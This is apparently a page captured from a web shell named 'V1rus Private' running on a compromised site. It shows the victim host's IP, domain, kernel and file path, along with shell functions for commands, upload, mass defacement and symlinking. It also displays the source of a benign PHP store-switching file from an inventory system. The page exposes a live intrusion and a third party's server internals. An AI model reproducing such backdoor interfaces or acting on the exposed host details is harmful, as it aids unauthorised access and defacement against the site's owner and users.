V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
public_html
/
InventorySystem
/
Viewing: change_store.php
<?php $page_title = 'Change Store'; require_once('includes/load.php'); // Check if user is logged in - specify the required user level // 1 = Admin, 2 = Special User, 3 = User page_require_level(1); // Or use appropriate level for your needs if(isset($_GET['store_id'])) { $store_id = (int)$_GET['store_id']; if(set_current_store($store_id)) { $session->msg('s', 'Store changed successfully.'); redirect('home.php', false); } else { $session->msg('d', 'Failed to change store.'); redirect('home.php', false); } } else { $session->msg('d', 'Store ID not specified.'); redirect('home.php', false); } ?>
Coded With 💗 by
HanzOFC